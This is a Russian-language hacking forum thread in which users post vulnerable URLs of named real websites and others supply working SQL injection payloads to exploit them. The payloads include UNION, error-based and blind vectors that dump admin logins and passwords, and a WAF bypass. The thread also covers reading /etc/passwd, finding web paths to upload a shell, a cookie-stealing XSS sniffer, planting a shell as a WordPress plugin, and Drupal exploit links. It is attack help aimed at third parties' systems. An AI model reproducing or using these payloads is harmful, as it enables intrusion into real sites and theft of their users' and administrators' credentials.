Есть ли тут sql?


http://dev.llli.org/donor/planned_giving.html?m=3


на кавычку реагирует, но ничего дальше сделать не выходит

Br@!ns said:
Есть ли тут sql?
на кавычку реагирует, но ничего дальше сделать не выходит


Не одними кавычками.

Нет, параметр вообще не динамический.

кто дотянет?)

http://www.worldwaterforum6.org/en/library/?no_cache=1&x_amswwfbd_pi1_list[evenements][564][uid]=564&tx_amswwfbd_pi1_list[evenements]=1

еррор басе в 1

DezMond™ said:
кто дотянет?)
http://www.worldwaterforum6.org/en/library/?no_cache=1&x_amswwfbd_pi1_list[evenements][564][uid]=564&tx_amswwfbd_pi1_list[evenements]=1
еррор басе в 1


SQLi в string плюс mq = on. поищите в другом месте

faza02 said:
SQLi в string плюс mq = on. поищите в другом месте


раскрутил сам) решил не удалял, чтоб потренились)

и чтот-то в string?)

https://store.tonibrattin.com/list.php?catid=7'&secid=&keyword=67&sort=ItemPrice'


Можно что нибудь сделать?

Code:
http://le-studio.ch/photographers/index.php?aid=22'

помогите раскрутить

vikler said:

Code:
http://le-studio.ch/photographers/index.php?aid=22'

помогите раскрутить




?aid=(22)and(1>1)--


Кто первым добивается вывода, получает '+'.

YaBtr said:
Кто первым добивается вывода, получает '
+
'.




http://le-studio.ch/photographers/index.php?aid=22/**/group/**/by/**/elt(rand(0),database())having/**/sum(0)


http://clip2net.com/s/3ao8WVf

http://clip2net.com/s/3ao93wA

uname -a


Code:
Linux x.com 2.6.18-308.el5.028stab099.3 #1 SMP Wed Mar 7 15:56:00 MSK 2012 x86_64

хочу порутать, но проблема в том, что не могу сделать бэк-коннект из-за отключенных системных функций


Code:
Disabled PHP Functions: dl , exec , passthru , pcntl_exec , pfsockopen , popen , posix_kill , posix_mkfifo , posix_setuid , proc_close , proc_open , proc_terminate , shell_exec , system , leak , posix_setpgid , posix_setsid , proc_get_status , proc_nice , show_source , escapeshellcmd

php 5.3.3

подскажите как можно это обойти и сделать бэк-коннект или хотя бы бинд порта.

:."]
.:[melkiy]:. said:
uname -a

Code:
Linux x.com 2.6.18-308.el5.028stab099.3 #1 SMP Wed Mar 7 15:56:00 MSK 2012 x86_64

хочу порутать, но проблема в том, что не могу сделать бэк-коннект из-за отключенных системных функций

Code:
Disabled PHP Functions: dl , exec , passthru , pcntl_exec , pfsockopen , popen , posix_kill , posix_mkfifo , posix_setuid , proc_close , proc_open , proc_terminate , shell_exec , system , leak , posix_setpgid , posix_setsid , proc_get_status , proc_nice , show_source , escapeshellcmd

php 5.3.3
подскажите как можно это обойти и сделать бэк-коннект или хотя бы бинд порта.


Если апач+allowoverride включен, то можно попробовать ssi или cgi.

Как обойти сей WAF?


Code:
http://ngmu.ru/common.php?page_services&section=-B'+union+select+1,2,3+--+

True


Code:
http://ngmu.ru/common.php?page_services&section=-B'+union+select+1,2,user()+--+

False

MaxFast said:
Как обойти сей WAF?

Code:
http://ngmu.ru/common.php?page_services&section=-B'+union+select+1,2,3+--+

True

Code:
http://ngmu.ru/common.php?page_services&section=-B'+union+select+1,2,user()+--+

False


WAF срабатывает на скобки:

true


http://ngmu.ru/common.php?page_services&section=-B%27+union+select+1,2,@@version+--+


false


http://ngmu.ru/common.php?page_services&section=-B%27+union+select+1,2,@@version+--+()


а вот собственно и таблички:


http://ngmu.ru/common.php?page_services&section=-B%27+union+select+1,2,table_name+from+information_ schema.tables+limit+0,1+--+


и да, обрати внимание, что это "НОВОСИБИРСКИЙ ГОСУДАРСТВЕННЫЙ МЕДИЦИНСКИЙ УНИВЕРСИТЕТ"

И забыл совсем про иные варианты команд. А как можно заменять скобки в таких конструкциях как concat? Char, base64?

Хотя для char и base64 тоже нужны скобки.

urlencode, double urlencode, utf encode

Помогите со слепой скулей. скриптик написать или сдампить нужные данные.

https://www.ckbproducts.com/ship_estimator.php?action=process

POST


shipzone=ghffgjfgj&shippostcode=67966&shipcountry=19'{SQL}


сдампить нужно


union+select+concat_ws(':',admin_id,admin_email_ad dress,admin_password)+from+admin+--+



если нужно вознаграждение - в пм или жабу)

На сайте есть файл crossdomain.xml с таким содержимым:


Code:


Как это можно использовать?

Blind

Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28col umn_name%29from%28information_schema.columns%29whe re%60table_name%60=information_schema%20and%28ordi nal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь.

http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&region=2&sessionlogin=1%27

помогите раскрутить

nike001 said:
На сайте есть файл crossdomain.xml с таким содержимым:

Code:


Как это можно использовать?


http://sethsec.blogspot.ru/2014/03/exploiting-misconfigured-crossdomainxml.html


lion_art said:
Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28col umn_name%29from%28information_schema.columns%29whe re%60table_name%60=information_schema%20and%28ordi nal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь.


что именно не получается? составьте корректный запрос и все нормально


reuvenmatbil said:
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&region=2&sessionlogin=1%27
помогите раскрутить




Code:
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&region=2&sessionlogin=1'|(extractvalue(1,repeat(version(),2 )))='1

noviks said:
помогите раскрутить http:// www.paid2earn.de/img/media.php?art=1'' MySQL error based



вот пример как вот здесь,почему не выводится,таким запросом

5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((select (select (select concat(0x27,unhex(Hex(cast(netzwerk_schnittstelle. betreiber_id as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle .betreiber_passwort as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle .betreiber_kennung as char))),0x27) from `mlsvsf_db`.netzwerk_schnittstelle limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2)) having min(0))

faza02 said:
что именно не получается? составьте корректный запрос и все нормально


В том то и дело, что не могу понять в чем ошибка моего запроса. 5я ветка... information_schema должна быть по определению...

Unknown column 'information_schema' in 'where clause'

Unknown
column
'information_schema'


information_schema - бд "по определению" а не колонка/таблица =)

у тебя же


table_
name
=information_schema


а надо, если нужна именно information_schema (хотя непонятно зачем она тебе):


table_
schema
=information_schema

Code:
http://www.puntoverdefolletto.com/prodotto.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--

madam said:
вот пример как вот здесь,почему не выводится,таким запросом
5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((select (select (select concat(0x27,unhex(Hex(cast(netzwerk_schnittstelle. betreiber_id as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle .betreiber_passwort as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle .betreiber_kennung as char))),0x27) from `mlsvsf_db`.netzwerk_schnittstelle limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2)) having min(0))


в примере версия >5.1. у вас тоже? почему бы не использовать более короткий и понятный вектор?


Code:
http://www.paid2earn.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,versi on())))

faza02 said:
в примере версия >5.1. у вас тоже? почему бы не использовать более короткий и понятный вектор?

Code:
http://www.paid2earn.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,versi on())))




версия 5.5.4 www.werbevirus.de/img/media.php?art=bannerklick

madam said:
версия 5.5.4 www.werbevirus.de/img/media.php?art=bannerklick




Code:
http://werbevirus.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,(SELE CT nickname FROM netzwerk_user LIMIT 0,1))))

а те колонки из вашего запроса - пустые.

faza02 said:

Code:
http://werbevirus.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,(SELE CT nickname FROM netzwerk_user LIMIT 0,1))))

а те колонки из вашего запроса - пустые.


спасибо

я маленько не так сделала

1 |(ExtractValue(1,concat(0x5c,(SELECT GROUP_CONCAT(CONCAT_WS(0x3a,betreiber_id,betreiber _passwort,betreiber_kennung)) FROM netzwerk_schnittstelle ))))

пустые но не все))

как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----

mazaxaka said:
как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----



select load_file('/etc/passwd')

Br@!ns said:
select load_file('/etc/passwd')


даже если так, то можно узнать папки из /home/, однако из /home/user/ или /home/user/***/www/--- нет. другие варианты: брутфорс, раскрытие путей

или как вариант, если тебе нужен список сайтов под определенным юзером ищи конфиг апача

mazaxaka said:
как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----


Если freebsd, то через пма можно узнать.

select load_file('home/user/') покажет все папки в папке user и т.д.

cipa21 said:
никак не могу раскрутить инъекцию
http://stats.chancemotion.ru/get_content.php
пост num=50
Направьте на путь истинный. Спасибо!


error based в limit


Code:
num=50,25+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+ extractvalue(1,concat(0x3A,version()))))--+

5.5.32

есть уязвимый кусок кода:


PHP:
$function($param1,$param2);

могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:


Code:
Fatal error: Call to undefined function phpinfo();exit()

Есть какой-нибудь вариант внедрения произвольного кода?

scr1m77 said:
есть уязвимый кусок кода:

PHP:
$function($param1,$param2);

могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:

Code:
Fatal error: Call to undefined function phpinfo();exit()

Есть какой-нибудь вариант внедрения произвольного кода?


нормально напишите сударь что за функция?

UXOR said:
нормально напишите сударь что за функция?


вроде предельно ясно написано, могу передавать произвольное значение. Например:


PHP:
$function=$_REQUEST['action'];

$function($param1,$param2);

scr1m77 said:
вроде предельно ясно написано, могу передавать произвольное значение. Например:

PHP:
$function=$_REQUEST['action'];

$function($param1,$param2);



Если не контролируются параметры (хотя бы один), то вряд ли получится RCE.

http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bview%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpicalendar&tx_cal_controller%5Buid%5D=357&tx_cal_controller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_controller%5Bday%5D=04

Можно чё нить с этим сделать?

Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`

Есть активная XSS на одном сайте и я хочу получить от него админку, но фишка вся с хостом. Под хостом имеется ввиду мой шелл на котором уже есть свой файл .htaccess в который нам нужно вставить свой код. .. Так вот вопрос, если я дополнительно вставлю свой код, на работе самого сайта это никак не отразится... сканеры могут обнаружить этот код?!

DezMond™ said:
http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bview%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpicalendar&tx_cal_controller%5Buid%5D=357&tx_cal_controller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_controller%5Bday%5D=04
Можно чё нить с этим сделать?
Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`


Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.


Unknowhacker said:
сканеры могут обнаружить этот код?!


Конечно могут.

XAMEHA said:
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.


Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...

DezMond™ said:
Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...


вы ошибаетесь. ошибка возникает при добавлении в лог. даже если так, то mq = on, а передаваемый URL — str

Да, можно наблюдать, что параметр достаточно экранируется. Ещё можно заметить, что используется драйвер MySQL Improved, а значит, что наиболее вероятно в запрос ни один из параметров непосредственно не попадает. Пациент мертв дважды.

Code:
http://infe{GOOGLE INDEX}vents.com/Lightbox{GOOGLE INDEX}Detail.aspx?boxid=229883%27&start=17

ничего не даёт, кроме раскрытия путей, верно?

vikler said:

Code:
http://infe{GOOGLE INDEX}vents.com/Lightbox{GOOGLE INDEX}Detail.aspx?boxid=229883%27&start=17

ничего не даёт, кроме раскрытия путей, верно?


ну и раскрытие информации о сервере

Добрый день! Кто-нибудь может подсказать как проверить на уязвимость GHOST удаленный сервер, а не собственный?

CyberTm1 said:
Добрый день! Кто-нибудь может подсказать как проверить на уязвимость GHOST удаленный сервер, а не собственный?


http://habrahabr.ru/company/dsec/blog/249007/#comment_8247401

Насчёт XSS. Делал по этому примеру (https://antichat.live/threads/44125/) воспользовался своим шеллом. Отредактировал файл .htaccess создал файл s.php с тем кодом и имедж ..Потом решил на себе поэкспериментировать и когда все сделал перешел по вредоносной ссылке.. но в итоге пришел отчет на почту только IP а куки были ПУСТЫ http://s7.hostingkartinok.com/uploads/images/2015/02/65f1cbd3bb4608c821418d0d88f0667a.jpg

вроде все правильно настроил, раз отчет пришел Ноо.. И еще вопрос когда перехожу на ссылку отображается сайт и уязвимое место и весь код в расшифрованном виде.. т.е видно где залит сниффер

vikler said:

Code:
http://sutton{GOOGLE INDEX}images.com/searchre{GOOGLE INDEX}sult.aspx?archive=Archive&search=08gp03a'&page=9

Не получается здесь раскрутить у меня
Кто-нибудь может? Ну или не обызательно в этом скрипте, на сайте полно дырок вообще


В данном скрипте раскрутить можно только через ошибку, так как уязвимый параметр участвует в 2-х запросах с разным количеством полей:


Code:
SELECT count(*) from images where (match(filename,description,supplementalcategories ,title,keywords,credit) against('("INJ")' IN BOOLEAN MODE)) AND (archive='Archive') ORDER BY lastmodified DESC, id DESC LIMIT 2000

SELECT filename,fullpath,description,title,keywords,credi t from images where (match(filename,description,supplementalcategories ,title,keywords,credit) against('("INJ")' IN BOOLEAN MODE)) AND (archive='Archive') ORDER BY lastmodified DESC, id DESC LIMIT 2000

Запросы составлены таким образом, что составить универсальный вектор с использованием UNION SELECT нельзя. Пример вывода через ошибку:


Code:
archive=Archive&search=08gp03a'*updatexml(1,concat(0x3A,version()) ,1)*'&page=9

archive=Archive&search=%22%29%27%20IN%20BOOLEAN%20MODE%29%29AND%28 archive=%27Archive%27%29ORDER/**/BY%28SELECT%28i/**/IS/**/NOT/**/NULL%29-%28-9223372036854775808%29FROM%28SELECT%28(SELECT version())%29i%29a%29%20+--+&page=9

Последний вектор дает 475 байтов вывода.

Всем добрый вечер. Ребята помогите раскрыть путь к сайта.

http://subdomain1.subdomain2.domain.com/

web server operating system: Linux Ubuntu 11.10 (Oneiric Ocelot)

web application technology: Apache 2.2.20, PHP 5.3.6

back-end DBMS: MySQL 5.0

пробовал и нашел:


Code:
/etc/apparmor.d/usr.sbin.mysqld
/var/run/mysqld/mysqld.sock
/etc/mysql/my.cnf
/etc/init.d/mysql
/etc/hosts
/etc/passwd

-------------------------------------

Результат ноль:


Code:
· /var/www/html/
· /var/www/web1/html/
· /var/www/sitename/htdocs/
· /var/www/localhost/htdocs
· /var/www/vhosts/sitename/httpdocs/
· /etc/init.d/apache
· /etc/init.d/apache2
· /etc/httpd/httpd.conf
· /etc/apache/apache.conf
· /etc/apache/httpd.conf
· /etc/apache2/apache2.conf
· /etc/apache2/httpd.conf
· /usr/local/apache2/conf/httpd.conf
· /usr/local/apache/conf/httpd.conf
· /opt/apache/conf/httpd.conf
· /home/apache/httpd.conf
· /home/apache/conf/httpd.conf
· /etc/apache2/sites-available/default
· /etc/apache2/vhosts.d/default_vhost.include

---------------------------------------

etc/passwd


Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vps68:x:1000:1000:vps68,,,:/home/vps68:/bin/bash
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

не могу найти путь к апаче

d4rk73rr0r said:
Всем добрый вечер. Ребята помогите раскрыть путь к сайта.
http://subdomain1.subdomain2.domain.com/
web server operating system: Linux Ubuntu 11.10 (Oneiric Ocelot)
web application technology: Apache 2.2.20, PHP 5.3.6
back-end DBMS: MySQL 5.0
пробовал и нашел:

Code:
/etc/apparmor.d/usr.sbin.mysqld
/var/run/mysqld/mysqld.sock
/etc/mysql/my.cnf
/etc/init.d/mysql
/etc/hosts
/etc/passwd

-------------------------------------
Результат ноль:

Code:
· /var/www/html/
· /var/www/web1/html/
· /var/www/sitename/htdocs/
· /var/www/localhost/htdocs
· /var/www/vhosts/sitename/httpdocs/
· /etc/init.d/apache
· /etc/init.d/apache2
· /etc/httpd/httpd.conf
· /etc/apache/apache.conf
· /etc/apache/httpd.conf
· /etc/apache2/apache2.conf
· /etc/apache2/httpd.conf
· /usr/local/apache2/conf/httpd.conf
· /usr/local/apache/conf/httpd.conf
· /opt/apache/conf/httpd.conf
· /home/apache/httpd.conf
· /home/apache/conf/httpd.conf
· /etc/apache2/sites-available/default
· /etc/apache2/vhosts.d/default_vhost.include

---------------------------------------
etc/passwd

Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vps68:x:1000:1000:vps68,,,:/home/vps68:/bin/bash
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

не могу найти путь к апаче


LFI? что, конкретно, нужно? если error_log или access_log, попробуйте /proc/self/fd/2 и /proc/self/fd7 соответственно. да и список путей на ваших не ограничивается: /thread324564.html, http://rafale.org/~mattoufoutu/darkc0de.com/c0de/php/DarkLFI.txt

стоит также погуглить на наличие еще возможных путей.

извиняюсь, Это не LFI, а скул инъекция вообще то. есть file_priv=Y. мне нужна путь к сайта что бы залить шел. там нету даже пхпинфо или phpmyadmin . Я здесь все пробовал: /thread324564.html

d4rk73rr0r said:
извиняюсь, Это не LFI, а скул инъекция вообще то. есть file_priv=Y. мне нужна путь к сайта что бы залить шел. там нету даже пхпинфо или phpmyadmin . Я здесь все пробовал: /thread324564.html


пройдитесь еще по второму словарю. также, методы для раскрытия путей: https://rdot.org/forum/showthread.php?t=82

Есть сайт с версией phpMyAdmin 2.11.11.3 , setup и signon не удаляли.

Попробовал этот сплоит https://rdot.org/forum/showpost.php?p=13736&postcount=6 .

Получил какие-то куки, но после подмены все ровно требует пароль.

Какие вообще есть уязвимости под phpMyAdmin 2.11.11.3?

Code:
http://mez{REMOVE THIS}calent.com

Скулы в форме авторизации. Но из-за редиректа не могу норм раскрутить. Ребят, будут подсказки?

vikler said:

Code:
http://mez{REMOVE THIS}calent.com

Скулы в форме авторизации. Но из-за редиректа не могу норм раскрутить. Ребят, будут подсказки?



email=-1'or(mid(version(),1,1)=5)--&password=qwerty

YaBtr said:
email
=
-1'or(mid(version(),1,1)=5)--
&
password
=qwerty


хмм, спасибо, ответ правда тот же:


Code:
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/mezcalent.com/httpdocs/public_actions.php on line 536

не вижу вывода версии

vikler said:
хмм, спасибо, ответ правда тот же:

Code:
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/mezcalent.com/httpdocs/public_actions.php on line 536

не вижу вывода версии


При слепых! инъекциях Вы и не увидите вывода. Играетесь с boolean-query. В Вашем случае при истине возвращается страница /renew.php?id=1, в обратном же случае начальная страница авторизации.

Vip77 said:
Есть сайт с версией phpMyAdmin 2.11.11.3 , setup и signon не удаляли.
Попробовал этот сплоит https://rdot.org/forum/showpost.php?p=13736&postcount=6 .
Получил какие-то куки, но после подмены все ровно требует пароль.
Какие вообще есть уязвимости под phpMyAdmin 2.11.11.3?


http://packetstormsecurity.com/files/121275/phpMyAdmin-Session-Serialized-Code-Execution.html

при mq = off и PHP

faza02 said:
http://packetstormsecurity.com/files/121275/phpMyAdmin-Session-Serialized-Code-Execution.html


Session path was not found =/

[QUOTE="faza02"]
faza02 said:
при mq = off и PHP

YaBtr said:
При
слепых!
инъекциях Вы и не увидите вывода. Играетесь с boolean-query. В Вашем случае при истине возвращается страница /renew.php?id=1, в обратном же случае начальная страница авторизации.


всё, понятно ) Слепая же. Спасибо !!!

блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница

madam said:
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница


SELECT mid(password,31,32) FROM oto_admin LIMIT 1

faza02 said:
SELECT mid(password,
31,32
) FROM oto_admin LIMIT 1



спасибо)

madam said:
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница


Данные векторы потихоньку уходят в прошлое. Если версия форка позволяет, используйте вектор с наибольшим количеством вывода символов (475! error-based через begint):


?id=1+|(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (SELECT password FROM oto_admin LIMIT 1)i)a)


Пример: /showpost.php?p=3815102&postcount=23814

Есть уязвимый скрипт, который производит распаковку zip-архива, загруженного пользователем.

Можно ли создать zip-архив, который бы распаковывался, например, на диреторию више ("../") ?

Вроде видел пример создания такого архива, но не могу найти.

вопрос от начинающего

база 5.0.95

вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(table_name),5,6+from+information_schema.ta bles--

нахожу нужную мне таблицу например у меня modx_active_users -

делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(column_name),5,6+from+information_schema.c olumns+where+table_name='modx_active_users'--

и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1

так как начинающий я непойму что делаю нетак!?

izzy said:
вопрос от начинающего
база 5.0.95
вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(table_name),5,6+from+information_schema.ta bles--
нахожу нужную мне таблицу например у меня modx_active_users -
делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(column_name),5,6+from+information_schema.c olumns+where+table_name='modx_active_users'--
и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1
так как начинающий я непойму что делаю нетак!?



Скорее всего magic_quotes_gpc = on

Используйте hex или char.

стоит фильтрация на ( и ). пробовал обойти с помощью urlencode — не вышло

что предпринять можно?

большое спасибо помог - char

reuvenmatbil said:

Code:
partenaires/partenaires.cgi?CAT=1+div+0+union+select+1,@@versi on,3,4,5,6--+&PAYS=AF

стоит фильтрация на ( и ). пробовал обойти с помощью urlencode — не вышло
что предпринять можно?


кроме ( и ) еще *, WAF на and. во всех полях ругался на кодировку, кроме 4. там и вывод номральный


Code:
partenaires/partenaires.cgi?CAT=1+|+1=0+union+select+1,2,3,tab le_name,5,6+from+information_schema.tables--+&PAYS=AF

Есть сайт со sqli (старая версия drupal) CVE-2014-3704

Использовал следующие эксплоиты:

http://www.exploit-db.com/exploits/34993/

http://www.exploit-db.com/exploits/34992/

http://www.exploit-db.com/exploits/34984/

Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.

Как раскрутить я не знаю.

Sqli при пост запросе:

http://www.site.com/?q=node&destination=node

name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=user_login_block&op=Log%2Bin

output:


Warning: mb_strlen() expects parameter 1 to be string, array given in drupal_strlen() (Zeile 478 von /pages/bd/asd/home/htdocs/site/includes/unicode.inc).
Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (Zeile 981 von /pages/bd/asd/home/htdocs/site/includes/database/database.inc).
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0', :name_0 AND status = 1; Array ( [:name_0'] => 0; [:name_0] => asd ) in user_login_authenticate_validate() (Zeile 2148 von /pages/bd/asd/home/htdocs/site/modules/user/user.module).

Vip77 said:
Есть сайт со sqli (старая версия drupal) CVE-2014-3704
Использовал следующие эксплоиты:
http://www.exploit-db.com/exploits/34993/
http://www.exploit-db.com/exploits/34992/
http://www.exploit-db.com/exploits/34984/
Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.
Как раскрутить я не знаю.
Sqli при пост запросе:
http://www.site.com/?q=node&destination=node
name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=user_login_block&op=Log%2Bin
output:


Ничего сложного, напиши мне по контактам в профиле, объясню.

scr1m77 said:
Ничего сложного, напиши мне по контактам в профиле, объясню.


Благодарю за помощь.

При проверки на XSS сайт на экране "7" (не всплывающая)


Code:
chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27% 29%3C/script%3E

2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.

Unknowhacker said:
2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.


а ты сам то как думаешь?

Unknowhacker said:
При проверки на XSS сайт на экране "7" (не всплывающая)

Code:
chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27% 29%3C/script%3E

2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.


возможно WAF.

обход авторизации? маловероятно, но попробуйте. стоит также рассмотреть и другие варианты уязвимостей

UXOR said:
а ты сам то как думаешь?


Я то думаю, что никак. Решил уточнить

.. faza02, каким образом обойти авторизацию?

есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается

почему то выдает


Удаленный сервер или файл не найден


грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет.

что в таком случае можно сделать?

также рут в бд, но пути не раскрываются

mazaxaka said:
есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается
почему то выдает
грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет.
что в таком случае можно сделать?
также рут в бд, но пути не раскрываются


Ну, вообще-то если ты загружаешь плагин - то шелл будет не в папке uploads. Скачай готовый плагин, замени файл на шелл, загрузи и иди по примерно такому пути: site.com/wp-content/plugins/название_плагина/файл_с_шеллом.php.

Unknowhacker said:
Я то думаю, что никак. Решил уточнить
.. faza02, каким образом обойти авторизацию?


csrf например

вопрос

хочю проверить наличие File_Priv

узнаю пользователя так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,user(),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--

получаю u1094094_sangha@дальше ip.

далле хочу узнать наличие File_Priv вот так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,file_priv, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql. user+where+user='u1094094_sangha'--

и получаю You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'u1094094_sangha\'--' at line 1 (совет учить английский не помог)

что делаю нетак?

